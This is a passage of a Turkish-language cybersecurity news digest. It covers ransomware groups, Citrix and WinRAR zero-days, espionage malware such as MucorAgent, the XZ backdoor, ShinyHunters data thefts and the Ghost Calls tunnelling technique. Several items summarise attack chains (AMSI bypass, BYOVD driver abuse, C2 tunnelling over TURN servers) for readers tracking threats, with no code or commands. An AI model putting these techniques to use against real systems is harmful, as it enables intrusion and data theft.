• Exchange 2019 için CU14/15, Exchange 2016 için CU23 yüklenmesi,

• Nisan 2025 hotfix’inin uygulanması.

Uyarı: tam etki alanı ele geçirilebilir
CISA, önlemlerin alınmaması halinde hem hibrit bulut hem de on-premise ortamların tamamen ele geçirilme riskiyle karşı karşıya olduğunu açıkladı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Dört üst düzey üye iade edildi
Gana merkezli dolandırıcılık örgütünün yöneticileri olduğu belirtilen Isaac Oduro Boateng (“Kofi Boat”), Inusah Ahmed (“Pascal”), Derrick Van Yeboah (“Van”) ve Patrick Kwame Asare (“Borgar”), 7 Ağustos’ta ABD’ye getirildi.

Yöntem: aşk dolandırıcılığı ve e-posta saldırıları
Mahkeme belgelerine göre çete, çoğunlukla yalnız yaşayan yaşlı Amerikalıları sahte romantik ilişkilerle kandırdı. Güven kazandıktan sonra mağdurları para göndermeye ikna ettiler. ABD’deki aracılar parayı akladıktan sonra asıl faillerin bulunduğu Batı Afrika’ya gönderdi.

Çete aynı zamanda şirketleri de hedef aldı. Çalışanların veya müşterilerin e-posta adreslerini taklit eden sahte hesaplarla finans yetkililerini kandırarak milyonlarca dolarlık havaleler yaptırdılar. Sahte imzalı belgelerle transferleri meşrulaştırdılar.

“Chairmen” adıyla yönetilen yapı
Boateng ve Ahmed örgütte “chairman” (başkan) rolünü üstlenirken, Asare ve Van Yeboah da üst düzey konumlarda faaliyet gösterdi. Van Yeboah’ın özellikle aşk dolandırıcılığı operasyonlarında aktif rol aldığı belirlendi.

Ağır cezalar gündemde
Sanıklar; kablolu dolandırıcılık yapmak ve buna teşebbüs (20 yıla kadar), kara para aklama (20 yıl), çalıntı para alma ve buna teşebbüs (5 yıl) ve çalıntı parayı elde tutma (10 yıl) suçlamalarıyla yargılanacak.

Kaynak: CUMHA - CUMHUR HABER AJANSI

DarkBit saldırıları ve siyasi arka plan
2023’te gerçekleşen saldırıların, İran’daki mühimmat fabrikasına yönelik drone saldırılarının ardından misilleme amacı taşıdığı değerlendiriliyor. DarkBit grubu, daha önce İsrail’deki eğitim kurumlarını hedef almış ve propaganda içerikli fidye notları bırakmıştı. İsrail Ulusal Siber Komutanlığı, saldırıları MuddyWater ile ilişkilendirmişti.

Zayıf şifreleme yöntemi tespit edildi
Profero uzmanları, saldırıda kullanılan DarkBit fidye yazılımını analiz etti. Her dosya için AES-128-CBC ile üretilen anahtarların düşük entropiye sahip olduğu, zaman damgalarıyla birlikte olası kombinasyonların birkaç milyar ihtimale düştüğü keşfedildi.

ESXi sunucularındaki avantaj
Araştırmacılar, VMware sanal disk (VMDK) dosyalarının bilinen başlık baytlarını referans alarak brute force yöntemini hızlandırdı. Ayrıca VMDK dosyalarının seyrek yapısı nedeniyle, şifrelenmemiş geniş boşluklardan değerli verilerin doğrudan kurtarılabildiği belirlendi.

Fidye ödenmeden dosyalar geri alındı
Geliştirilen özel araç sayesinde, saldırganların talep ettiği 80 Bitcoin ödenmeden kritik dosyaların çoğu kurtarıldı. Profero, DarkBit’in fidye yerine veri silici (wiper) kullansaydı amacına daha uygun sonuç alabileceğini belirtti.

Kurtarma aracı halka açılmadı
Profero, DarkBit için geliştirdiği çözüm aracını kamuya açıklamayacağını, ancak gelecekte benzer saldırılardan etkilenen kurumların kendileriyle iletişime geçerek destek alabileceğini duyurdu.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Sıfır gün olarak kullanıldı
ESET, 18 Temmuz 2025’te RomCom grubunun WinRAR’daki belirsiz bir yol geçişi açığını istismar ettiğini tespit etti. Açık, alternatif veri akışlarının (ADS) kullanımıyla kötüye kullanılabiliyor ve CVE-2025-8088 olarak kaydedildi.

Zararlı dosyalar Startup klasörüne düşüyor
Hazırlanan RAR arşivlerinde sahte yollarla doldurulmuş çok sayıda ADS girdisi bulunuyor. Bunlar, zararlı DLL, EXE ve LNK dosyalarının arşiv açıldığında %TEMP% ve %LOCALAPPDATA% klasörlerine, kısayolların ise Windows Başlangıç klasörüne yerleştirilmesini sağlıyor.

Üç farklı saldırı zinciri
ESET, saldırılarda kullanılan üç ayrı enfeksiyon zinciri tespit etti:

• Mythic Agent: COM hijacking yoluyla AES şifreli shellcode çalıştırıyor, yalnızca belirli etki alanlarında aktif oluyor.

• SnipBot: Sahte bir PuTTY türeviyle yükleniyor, açılan belgeleri kontrol ederek ek zararlı indiriyor.

• MeltingClaw: RustyClaw üzerinden DLL indirip daha fazla modül çalıştırıyor.

Ek aktörler de açığı kullandı
Bi.Zone, CVE-2025-8088’in yanı sıra CVE-2025-6218 açığını da istismar eden “Paper Werewolf” adını verdiği farklı bir saldırı kümesini raporladı.

Güncelleme manuel yapılmalı
RARLab, açığın kapatıldığı 7.13 sürümünü 30 Temmuz’da yayımladı. Ancak WinRAR otomatik güncelleme özelliği içermediği için kullanıcıların en son sürümü manuel olarak indirip kurmaları gerekiyor.

Risk neden yüksek
Windows 2023’te RAR desteği eklese de kapsamı sınırlı. Kurumsal kullanıcılar ve ileri seviye bireysel kullanıcılar hâlen WinRAR’a bağımlı, bu da yazılımı saldırganlar için cazip hale getiriyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Bellek taşması sıfır gün olarak kullanıldı
Citrix NetScaler ADC ve Gateway ürünlerinde bulunan CVE-2025-6543, bellek taşması nedeniyle yetkisiz komut çalıştırılmasına veya hizmet reddine yol açabiliyor. Açık, VPN, ICA Proxy, CVPN, RDP Proxy ve AAA sanal sunucularını etkiliyor.

Kritik kurumlar hedef oldu
NCSC, Mayıs 2025’ten itibaren saldırganların açığı sıfır gün olarak kullandığını ve Hollanda’daki birden fazla kritik kuruma sızdığını açıkladı. Saldırganlar izlerini silerek olayları tespit etmeyi zorlaştırdı.

Savcılık saldırıyı doğruladı
Hollanda Savcılığı (Openbaar Ministerie), 18 Temmuz’da sistemlerinin ihlal edildiğini duyurdu. Olay ciddi operasyonel kesintilere neden oldu, e-posta sunucuları ancak Ağustos başında yeniden çalışmaya başladı.

Citrix’in yayımladığı yamalar
Citrix, 25 Haziran’da yayımladığı bültende şu sürümlere güncelleme yapılmasını tavsiye etti:

• 14.1 → 14.1-47.46 ve sonrası

• 13.1 → 13.1-59.19 ve sonrası

• 13.1-FIPS ve 13.1-NDcPP → 13.1-37.236 ve sonrası
  12.1 ve 13.0 sürümleri içinse destek sona erdi, güncel sürümlere yükseltme öneriliyor.

Ek güvenlik adımları
Yamaların ardından aktif oturumların kapatılması (icaconnection, pcoipConnection, aaa, rdp) ve load balancing oturumlarının temizlenmesi tavsiye edildi. Ayrıca NCSC, olağan dışı PHP/XHTML dosyalarının tespiti için GitHub üzerinden bir tarama scripti yayımladı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Kimsuky’ye karşı etik çıkış
Sızıntıyı gerçekleştiren “Saber” ve “cyb0rg” takma adlı hackerlar, Phrack dergisinin DEF CON 33’te dağıtılan son sayısında, Kimsuky’yi “rejim çıkarlarına hizmet eden, etik dışı bir grup” olarak tanımladı. İkilinin açıklamasında, “Sanatı icra etmek yerine liderlerini zenginleştirmek için çalışan politik bir araçsınız” ifadeleri yer aldı.

8,9 GB veri çevrim içi yayımlandı
Distributed Denial of Secrets platformunda yayımlanan arşiv, Kimsuky’nin oltalama günlüklerini, çalıntı verilerini ve araçlarını içeriyor. Bunlar arasında:

• Güney Kore Savunma Karşı İstihbarat Komutanlığı’na (dcc.mil.kr) ait oltalama kayıtları,

• Güney Kore Dışişleri Bakanlığı’nın e-posta sistemi (“Kebi”) kaynak kodu,

• Vatandaşlık sertifikaları ve akademisyen listeleri,

• Sahte site oluşturma kiti (PHP Generator), canlı oltalama kitleri,

• Cobalt Strike yükleyicileri, ters bağlantı araçları ve Onnara proxy modülleri,

• VPN alımları, GitHub bağlantıları ve hack forumu kullanım kayıtları.

Operasyonel zorluk yaratabilir
Bitirici bir darbe olmasa da, uzmanlara göre bu ifşa Kimsuky’nin altyapısının “yanmasını” sağlayarak devam eden kampanyalarda aksamalara yol açabilir. Ayrıca, sızan belgeler Kimsuky’nin daha önce belgelenmemiş yöntemlerini ortaya çıkarıyor.

Araştırmacılar doğrulamaya çalışıyor
Sızdırılan dosyaların doğruluğu henüz bağımsız olarak tam teyit edilmedi. Ancak içerik, Kimsuky’nin bilinen faaliyetleriyle güçlü örtüşmeler taşıyor. Güvenlik araştırmacıları, sızıntının değerini analiz etmeye devam ediyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Ulusal Muhafızlar devreye girdi
29 Temmuz’da yaşanan saldırı sonrası Minnesota Valisi Tim Walz, şehrin olay müdahale kapasitesini aşan bu durum için Ulusal Muhafızları siber koruma desteği vermek üzere görevlendirdi. Şehir, çevrim içi ödemeler de dahil olmak üzere birçok hizmetin geçici olarak kesintiye uğradığını açıkladı.

Interlock saldırıyı üstlendi
Saint Paul Belediye Başkanı Melvin Carter, saldırının Interlock fidye yazılım grubu tarafından gerçekleştirildiğini ve fidye ödenmediğini doğruladı. Carter, vatandaşların kişisel veya finansal bilgilerinin saldırıdan etkilenmediğini söyledi.

66 bin dosya sızdırıldı
Interlock grubu, karanlık ağdaki sitesinde Saint Paul’u hedef olarak listeledi ve 43 GB büyüklüğünde, 66 binden fazla dosyayı ele geçirdiğini öne sürdü. Saldırganlar bu verilerin bir kısmını yayımladı.

Saldırının izleri
PRODAFT’ın açıklamasına göre saldırı, 20 Temmuz civarında şehir sistemlerine bulaştırılan ve Interlock’la ilişkilendirilen özel geliştirilmiş SystemBC RAT zararlısıyla başladı.

Grubun geçmişi
Eylül 2024’te ortaya çıkan Interlock, dünya genelinde özellikle sağlık kuruluşlarını hedef aldı. Daha önce İngiltere’deki üniversitelere NodeSnake trojanıyla saldırmış, DaVita’dan 1,5 TB ve Kettering Health’ten büyük miktarda veri çaldığını duyurmuştu. CISA ve FBI, saldırıdan günler önce Interlock’un kritik altyapılara yönelik çift şantajlı saldırılarında artış olduğunu açıklamıştı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Kritik açığa karşı cihazlar savunmasız
Citrix NetScaler cihazlarında tespit edilen CVE-2025-5777 (CitrixBleed 2) açığı, yetersiz girdi doğrulaması nedeniyle oluşan “out-of-bounds memory read” hatasından kaynaklanıyor. Hedef alınan cihazlar arasında VPN, ICA Proxy, CVPN, RDP Proxy ve AAA sanal sunucuları bulunuyor.

Oturum ele geçirme riski
Açık, saldırganlara oturum belirteçleri, kimlik bilgileri ve hassas verileri çalma imkânı tanıyor. Böylece kullanıcı oturumlarını ele geçirerek çok faktörlü kimlik doğrulamayı atlatabiliyorlar. Açık ilk olarak sıfır gün saldırılarında istismar edildi, kısa süre sonra da PoC exploit kodları yayımlandı.

Hâlâ binlerce cihaz açıkta
Shadowserver’ın 11 Ağustos raporuna göre dünya genelinde 3.312 cihaz hâlâ CVE-2025-5777’e karşı korunmasız. Ayrıca 4.142 cihaz, DoS saldırılarında aktif olarak istismar edilen başka bir kritik açık (CVE-2025-6543) için de yamalanmamış durumda.

Hollanda’da kritik kurumlar hedef alındı
Hollanda Ulusal Siber Güvenlik Merkezi (NCSC), CVE-2025-6543 açığının Mayıs ayından bu yana sıfır gün olarak kullanıldığını, kritik kuruluşların saldırıya uğradığını ve izlerin saldırganlar tarafından silindiğini duyurdu. Temmuz ayında Hollanda Savcılığı’nın (Openbaar Ministerie) saldırı sonrası e-posta sunucularında haftalarca kesinti yaşadığı açıklandı.

ABD kurumlarına zorunlu talimat
ABD Siber Güvenlik ve Altyapı Güvenliği Ajansı (CISA), iki açığı da aktif istismar edilen zafiyetler listesine ekleyerek federal kurumlara CVE-2025-5777 için 1 gün, CVE-2025-6543 için ise 21 Temmuz’a kadar yamaları uygulama talimatı verdi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Rusya çıkarlarıyla uyumlu operasyonlar
Bitdefender araştırmacıları, Curly COMrades adını verdikleri yeni bir siber casusluk grubunun Gürcistan’daki devlet ve yargı kurumlarını, Moldova’daki enerji şirketlerini hedef aldığını açıkladı. Grup, bilinen APT’lerle doğrudan örtüşmese de operasyonlarının Rusya’nın jeopolitik hedefleriyle paralellik gösterdiği ifade edildi.

MucorAgent arka kapısı
Grubun saldırılarında kullandığı MucorAgent zararlısı üç aşamalı yapıya sahip. İlk aşamada COM nesneleri ele geçirilerek ikinci aşama yükleniyor; bu bileşen Windows’un Antimalware Scan Interface (AMSI) korumasını atlatıyor. Üçüncü aşama ise belirli dizinlerde bulunan şifrelenmiş PNG dosyalarındaki verileri (muhtemelen komut dosyaları) çalıştırıyor.

Kalıcı erişim için yaratıcı yöntemler
Araştırmacılar, saldırganların NGEN (Native Image Generator) bileşenini hedef alarak devre dışı görünen ancak belirli durumlarda çalışan zamanlanmış görevleri kötüye kullandığını tespit etti. Ayrıca, Resocks proxy aracı, SOCKS5 sunucuları, SSH + Stunnel tünelleme ve CurlCat gibi özel geliştirilmiş araçlar kullanıldı.

Hedef: Kimlik bilgileri ve ağ hareketi
Saldırganların etki alanı denetleyicilerinden NTDS veritabanını ve LSASS bellek dökümlerini çıkarmaya çalıştığı, ağda kalıcı erişim için geçerli kimlik bilgilerini toplamaya odaklandığı belirtildi. Ayrıca netstat, tasklist, systeminfo, wmic, ipconfig gibi komutlar ve Active Directory keşfi için PowerShell betikleri kullanıldı.

Gizlilik çabaları sonuçsuz kaldı
Curly COMrades’in “living-off-the-land” teknikleri, açık kaynak araçları ve yoğun COM manipülasyonlarıyla gizlilik sağlamaya çalıştığı, ancak modern EDR/XDR sistemlerinin bu faaliyetleri tespit edecek kadar gürültü oluştuğu kaydedildi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

En yüksek güvenlik standardı
pKVM, Android cihazlarda sanallaştırma çerçevesinin çekirdeğini oluşturan hipervizör. Google, sistemin DEKRA tarafından akredite laboratuvarlarda test edildiğini ve gelişmiş tehditlere karşı dirençli olduğunun doğrulandığını duyurdu.

SESIP Level 5 nedir
SESIP (Security Evaluation Standard for IoT Platforms), IoT ve mobil platformlar için geliştirilen bir güvenlik standardı. Level 5, Common Criteria’nin (ISO 15408) en yüksek güvenlik seviyesi olan AVA_VAN.5’e eşdeğer. Bu seviye, pKVM’nin sofistike saldırılara karşı dayanıklı olduğunu ortaya koyuyor.

pKVM’nin kullanım alanları
Hipervizör, Android cihazlarda kritik görevlerin güvenli şekilde çalıştırılmasını sağlıyor. Bunlar arasında:

• Google’ın Gemini Nano gibi yapay zekâ modellerinin cihaz üzerinde çalıştırılması,

• biyometrik kimlik doğrulama (yüz, parmak izi),

• DRM korumalı içeriklerin işlenmesi,

• cihazın firmware düzeyinde güvenlik fonksiyonları bulunuyor.

Kullanıcılar için anlamı
Google’a göre akıllı telefonlar artık yalnızca kişisel bilgileri değil, aynı zamanda yapay zekâ modelleriyle işlenen yüksek değerli verileri de barındırıyor. Bu da saldırganlar için cazip bir hedef oluşturuyor. SESIP Level 5 sertifikası, Android cihazlarda bu verilerin güvenliğinin daha üst düzeyde sağlanacağı anlamına geliyor.

Google’dan açıklama
Android Güvenlik ve Gizlilik Başkan Yardımcısı Dave Kleidermacher, “Cihaz üzerinde yapılan işlemeler arttıkça, kişisel veriler daha değerli hale geliyor. Bu nedenle güçlü güvenlik önlemleri zorunlu” diyerek sertifikanın önemini vurguladı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

1 milyon dolarlık kriptoya el konuldu
ABD Adalet Bakanlığı, BlackSuit fidye yazılımı grubuna ait dijital varlıkların 9 Ocak 2024’te ele geçirildiğini açıkladı. Söz konusu varlıkların değeri 1.091.453 dolar olarak açıklandı. Kripto paralar, suçlular tarafından farklı borsalar üzerinden defalarca transfer edilerek izleri gizlenmeye çalışılırken tespit edilip donduruldu.

Fidye ödemesinden kaynaklanıyor
Yetkililere göre el konulan varlıklar, 4 Nisan 2023’te fidye ödemesi yapan bir kurbanın gönderdiği 49,3 Bitcoin’den elde edildi. O dönemde bu ödemenin değeri yaklaşık 1,44 milyon dolardı.

Operation Checkmate ile bağlantılı
Bu duyuru, uluslararası “Operation Checkmate” operasyonu kapsamında BlackSuit’in gasp sitelerinin ele geçirilmesinin ardından geldi. Operasyon, BlackSuit ile bağlantılı Royal, Quantum ve Chaos fidye yazılım platformlarını da hedef aldı.

ABD’de 450 kuruluşa saldırdılar
Geçen hafta ABD İç Güvenlik Bakanlığı, Royal ve BlackSuit çetelerinin sağlık, eğitim, enerji, kamu güvenliği ve devlet kurumları dahil 450’den fazla ABD kuruluşunu hedef aldığını açıkladı. Bu saldırılardan toplam 370 milyon dolar değerinde fidye ödemesi elde edildi.

Daha önce 20 Bitcoin’e el konulmuştu
28 Temmuz’da FBI Dallas, Chaos fidye yazılımı grubuyla bağlantılı bir adreste 20 Bitcoin’e (yaklaşık 2,4 milyon dolar) el koyduğunu duyurmuştu.

Stratejik öneme sahip hamle
Adalet Bakanlığı, suçtan elde edilen gelirlerin ele geçirilmesinin, yakalanamayan operatörlerin finansal gücünü kırmak ve altyapılarını yeniden kurmalarını engellemek için kritik öneme sahip olduğunu vurguladı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Toplam 107 güvenlik açığı kapatıldı
Microsoft’un bu ay yayımladığı yama paketi 44 yetki yükseltme, 35 uzaktan kod yürütme, 18 bilgi ifşası, 4 hizmet reddi ve 9 sahtecilik açığını gideriyor. Bu açıkların 13’ü “kritik” olarak sınıflandırıldı.

Kerberos’ta sıfır gün açığı
En dikkat çekici güncelleme, CVE-2025-53779 kodlu Windows Kerberos açığı oldu. Bu açık, doğrulanmış bir saldırganın domain yöneticisi ayrıcalıkları elde etmesine imkân tanıyor. Açığın teknik detayları Mayıs 2025’te Akamai’den Yuval Gordon tarafından yayımlanmıştı.

Kritik uzaktan kod yürütme açıkları
Düzeltmeler arasında Microsoft Office (Word, Excel, PowerPoint, Visio), SharePoint, SQL Server, Windows GDI+ ve Message Queuing bileşenlerinde kritik seviyede RCE açıkları da bulunuyor. Bu açıklar, saldırganların kullanıcı etkileşimi olmadan sistem üzerinde zararlı kod çalıştırmasına yol açabiliyor.

Öne çıkan diğer yamalar

• Exchange Server: CVE-2025-53786, hibrit kurulumlarda bulut ortamına yetkisiz erişim sağlayabilecek yetki yükseltme açığı.

• Windows NTLM: Kritik yetki yükseltme zafiyeti.

• Hyper-V: Hem DoS hem de uzaktan kod yürütme açıkları.

• Microsoft Teams: Uzaktan kod çalıştırma açığı.

Diğer üretici yamalarıyla paralel
Ağustos güncellemeleri, son haftalarda diğer üreticilerden gelen yamaları da takip ediyor. 7-Zip, Adobe, Cisco, Fortinet, Google (Android), SAP ve Trend Micro da aktif olarak istismar edilen açıklar için güvenlik güncellemeleri yayımladı.

Uzmanlardan öneri
Siber güvenlik uzmanları, özellikle Kerberos açığı ve Office ürünlerindeki RCE açıklarının kurumlar için ciddi risk oluşturduğunu belirterek güncellemelerin gecikmeden uygulanması gerektiğini vurguluyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Tehlike Docker Hub’da sürüyor
Binarly araştırmacıları, Docker Hub’da barındırılan en az 35 Linux imajında XZ-Utils arka kapısının hâlâ bulunduğunu tespit etti. Bu imajların bazıları, üzerinde inşa edilen yeni imajları da dolaylı olarak enfekte ediyor.

XZ-Utils arka kapısı nedir
XZ-Utils sıkıştırma aracının 5.6.0 ve 5.6.1 sürümlerinde tespit edilen arka kapı, liblzma.so kütüphanesine gizlenmişti. Kod, OpenSSH’deki RSA_public_decrypt fonksiyonunu ele geçiriyor ve özel bir anahtara sahip saldırganın SSH üzerinden root yetkisiyle giriş yapmasına olanak tanıyordu.

Debian imajları kaldırmadı
Araştırmacıların uyarılarına rağmen Debian, 64 bitlik bazı imajları Docker Hub’dan çekmediğini doğruladı. Gerekçe olarak, istismarın düşük ihtimalle gerçekleşebileceği ve eski imajların “tarihsel arşiv” olarak korunması gerektiği belirtildi.

Risk halen devam ediyor
Binarly, bu yaklaşımın yanlış olduğunu ve bu imajların kamuya açık tutulmasının, otomatik yapılar veya yanlışlıkla indirmeler yoluyla ciddi risk oluşturduğunu vurguladı.

Kullanıcılara tavsiye
Uzmanlar, kullanılan imajların manuel olarak kontrol edilmesi ve XZ-Utils’in en az 5.6.2 sürümüne güncellenmiş olduğunun doğrulanması gerektiğini hatırlatıyor. En güncel sürüm 5.8.1 olarak yayımlanmış durumda.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Veri sızıntısı doğrulandı
Allianz Life, Temmuz 2025’te CRM sistemlerinden büyük çaplı bir veri hırsızlığı yaşadığını açıklamıştı. Hafta sonu itibarıyla ShinyHunters grubu, çalınan “Accounts” ve “Contacts” veritabanı tablolarını internette yayımladı. Bu tablolar, 2,8 milyon müşteri ve iş ortağı kaydını içeriyor.

Hangi veriler ifşa oldu
Sızdırılan dosyalarda kişisel bilgiler (isim, adres, telefon numarası, doğum tarihi, vergi kimlik numarası) ile mesleki bilgiler (lisanslar, kurum bağlantıları, ürün onayları ve pazarlama sınıflandırmaları) yer alıyor. BleepingComputer, verilerin doğruluğunu etkilenen kişilerle teyit etti.

Saldırının yöntemi
2025’in başında başlayan saldırı dalgasında tehdit aktörleri, çalışanları kandırarak şirketlerin Salesforce sistemlerine kötü amaçlı OAuth uygulamaları bağlatıyor. Bu bağlantılar üzerinden veritabanlarını indirip şirketlere fidye talebi gönderiyorlar.

Hacker gruplarının birleşimi
ShinyHunters, saldırının ardından yaptığı açıklamada Scattered Spider ile tek grup olduklarını duyurdu. Grup, daha önce Snowflake saldırısında da benzer yöntemlerle veri çalmıştı. Araştırmacılar, Lapsus$ grubunun eski üyelerinin de bu saldırılarda rol almış olabileceğini değerlendiriyor.

Allianz Life sessiz
Şirket, devam eden soruşturmayı gerekçe göstererek sızdırılan veriler hakkında yorum yapmadı. Ancak uzmanlar, ifşa edilen verilerin kimlik hırsızlığı ve dolandırıcılık risklerini artırdığı uyarısında bulunuyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Google da saldırıya uğradı
Google, dün gece yaptığı güncellemede Haziran ayında şirketin bir Salesforce CRM örneğinin ShinyHunters tarafından hedef alındığını doğruladı. Saldırıda küçük ve orta ölçekli işletmelere ait iletişim bilgileri ve notların indirildiği belirtildi.

Veriler sınırlı ama risk devam ediyor
Google’ın açıklamasına göre çalınan veriler esasen işletme adı ve iletişim bilgileri gibi büyük ölçüde kamuya açık bilgilerden oluşuyor. Ancak saldırı, müşteri güvenliği açısından dikkat çekici bulunuyor.

ShinyHunters kampanyası genişliyor
ShinyHunters, yıllardır Oracle Cloud, Snowflake, AT&T, Wattpad, MathWay gibi kurumlara yönelik saldırılarla biliniyor. Grup, son dönemde Adidas, Qantas, Allianz Life, Cisco, Louis Vuitton, Dior ve Tiffany & Co. gibi şirketlerin Salesforce sistemlerini de hedef aldı.

Vishing ve şantaj yöntemleri
Saldırılar, çalışanları hedef alan telefonla oltalama (vishing) teknikleriyle başlatılıyor. Grup, ele geçirdiği verileri kullanarak şirketlere e-posta yoluyla fidye talep ediyor. Şirketler ödeme yapmazsa verilerin sızdırılacağı tehdidinde bulunuyor. Bazı firmaların şimdiden ödeme yaptığı, bir şirketin verilerini sızdırmamak için yaklaşık 400 bin dolar değerinde Bitcoin gönderdiği öğrenildi.

Google’ın önlemleri
Google, saldırının ardından etki analizini tamamladığını ve gerekli güvenlik önlemlerini devreye aldığını açıkladı. Ancak ShinyHunters’ın saldırıları hâlen sürdüğü ve daha fazla büyük şirketin risk altında olduğu bildirildi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Görüşme trafiği kılıfında saldırı
Praetorian araştırmacısı Adam Crosser, “Ghost Calls” yöntemini BlackHat USA’da sundu. Bu teknik, Zoom ve Teams gibi konferans uygulamalarında kullanılan TURN protokolünü kullanarak saldırganların kurban sistem ile kendi altyapıları arasında WebRTC tüneli açmasına olanak sağlıyor.

Nasıl çalışıyor
Bir kullanıcı Zoom ya da Teams toplantısına katıldığında, geçici TURN kimlik bilgileri alıyor. Ghost Calls, bu kimlik bilgilerini kötüye kullanarak saldırgan ile hedef sistem arasında şifrelenmiş bir WebRTC tüneli kuruyor. Bu tünel, saldırı trafiğini normal konferans trafiği gibi gösterdiği için güvenlik duvarları, proxy’ler ve TLS denetimleri tarafından fark edilmiyor.

Yeni araç: TURNt
Crosser, “TURNt” adlı açık kaynak bir araç geliştirdi. Bu araç, saldırgan tarafında bir Controller (SOCKS proxy sunucusu) ve kurban sistemde çalışan bir Relay bileşeninden oluşuyor. TURN sunucuları üzerinden C2 trafiğini tünelleyebilen TURNt, SOCKS proxying, port yönlendirme, veri sızdırma ve gizli VNC bağlantılarına imkân sağlıyor.

Zoom’dan ilk önlem
Zoom, BleepingComputer’a yaptığı açıklamada, Ghost Calls’a karşı TURN altyapısının yalnızca medya sunucularla eşleşmeye izin verecek şekilde güncellendiğini ve peer-to-peer bağlantıların engellendiğini duyurdu. Microsoft’un ek önlem planlarına dair ise henüz bir bilgi bulunmuyor.

Tehditin önemi
Ghost Calls, herhangi bir sıfır gün zafiyetine ihtiyaç duymadan, tamamen mevcut protokollerin doğasından yararlanıyor. Uzmanlara göre bu tür yöntemler, saldırganlara hem performans hem de anonimlik sağlıyor ve geleneksel C2 yöntemlerine göre daha gizli ilerliyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Meşru sürücüyle güvenlik devre dışı bırakılıyor
Akira fidye yazılımı, ThrottleStop aracıyla kullanılan Intel sürücüsü “rwdrv.sys” üzerinden çekirdek seviyesinde erişim sağlıyor. Ardından “hlpdrv.sys” adlı kötü amaçlı sürücüyü yükleyerek Windows Defender’ın DisableAntiSpyware ayarını değiştiriyor ve korumaları devre dışı bırakıyor.

BYOVD tekniğiyle saldırı
Bu yöntem, “Bring Your Own Vulnerable Driver” (BYOVD) saldırı tekniğinin bir örneği. Yasal olarak imzalı ancak güvenlik açıkları bulunan sürücüler kullanılarak sistemde ayrıcalık yükseltiliyor. Akira’nın bu tekniği son haftalarda tekrarlayan saldırılarda sıkça görüldü.

SonicWall VPN saldırılarıyla bağlantı
Akira grubu kısa süre önce SonicWall SSLVPN servislerini de hedef aldı. Zero-day açık ihtimali gündeme gelse de, SonicWall henüz doğrulama yapmadı. Şirket, SSLVPN’in sınırlandırılması, MFA zorunluluğu, botnet/Geo-IP filtreleri ve kullanılmayan hesapların silinmesi gibi acil önlemler önerdi.

Sahte yazılım siteleriyle yayılıyor
The DFIR Report’a göre saldırılarda trojanlı MSI kurulum dosyaları kullanılıyor. “ManageEngine OpManager” gibi yazılımları arayan kullanıcılar, SEO zehirlemesi yoluyla opmanager[.]pro gibi sahte sitelere yönlendiriliyor. Bu sitelerden indirilen dosyalar, Bumblebee yükleyicisi aracılığıyla Akira’nın sisteme yerleşmesini sağlıyor.

Saldırıların ilerleyişi
Bumblebee, DLL yan yükleme yöntemiyle başlatılıyor, ardından AdaptixC2 ile kalıcı erişim sağlanıyor. Saldırganlar FileZilla üzerinden veri sızdırıyor, RustDesk ve SSH tünelleriyle kalıcılığı sürdürüyor. Ortalama 44 saat içinde “locker.exe” fidye yazılımı devreye giriyor ve etki alanlarındaki sistemler şifreleniyor.

Uzmanlardan uyarı
Güvenlik araştırmacıları, yalnızca resmi kaynaklardan yazılım indirilmesini, Akira ile ilgili IoC’lerin yakından takip edilmesini ve BYOVD tabanlı saldırılara karşı güvenlik çözümlerinin güncel tutulmasını öneriyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Saldırı müşteri hizmeti platformunda gerçekleşti
Air France ve KLM, 6 Ağustos 2025’te yaptıkları açıklamada, kullandıkları harici müşteri hizmeti platformunda olağandışı hareket tespit edildiğini ve bunun sonucunda müşteri verilerine yetkisiz erişim sağlandığını açıkladı.

Finansal veriler etkilenmedi
Şirketten yapılan duyuruda, saldırganların isim, e-posta adresi, telefon numarası, ödül programı bilgileri ve son işlem kayıtlarına ulaştığı, ancak müşterilerin finansal bilgilerinin ve kişisel güvenlik verilerinin etkilenmediği vurgulandı.

Yetkililer bilgilendirildi, müşteriler uyarıldı
KLM, olayı Hollanda Veri Koruma Kurumu’na, Air France ise Fransa’daki CNIL’e bildirdi. Etkilenen müşterilere uyarı mesajları gönderilerek şüpheli e-posta ve telefon aramalarına karşı dikkatli olmaları gerektiği belirtildi.

ShinyHunters grubuna bağlanıyor
BleepingComputer’un ulaştığı bilgilere göre olay, Salesforce platformlarını hedef alan ve Adidas, Qantas, Dior, Louis Vuitton, Chanel, Tiffany & Co. ile Google gibi markaları da etkileyen ShinyHunters grubunun sosyal mühendislik saldırılarıyla bağlantılı.

Havacılık sektörü saldırıların odağında
Air France–KLM olayı, son dönemde havacılık ve ulaşım sektörüne yönelen saldırıların bir parçası olarak değerlendiriliyor. Daha önce Scattered Spider grubu WestJet ve Hawaiian Airlines gibi firmaları hedef almıştı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Yıllardır korsan yayın yapıyordu
Kuzey Carolina merkezli Rare Breed TV, dünyanın en büyük korsan IPTV hizmetlerinden biri olarak öne çıkıyordu. Platform, aylık 15,99 dolardan başlayan aboneliklerle binlerce canlı kanal ve 14 bini aşkın film-dizi arşivi sunuyordu.

ACE’den yaptırım kararı
Amazon, Netflix, Disney, Warner Bros. ve Apple TV+ gibi 50’den fazla şirketin yer aldığı ACE, korsan IPTV hizmetini tespit ettikten sonra işletmecilerle iletişime geçti. Taraflar arasında varılan anlaşmayla platformun kapatılması ve ciddi miktarda tazminat ödenmesi kararlaştırıldı.

Site hâlen erişime açık
ACE açıklamasına rağmen Rare Breed TV’nin web sitesinin habere konu tarihte hâlâ erişime açık olduğu ve abonelik satışına devam ettiği görüldü. Konuyla ilgili olarak ACE’den ek yorum alınamadı.

Küresel korsan yayın operasyonları hedefte
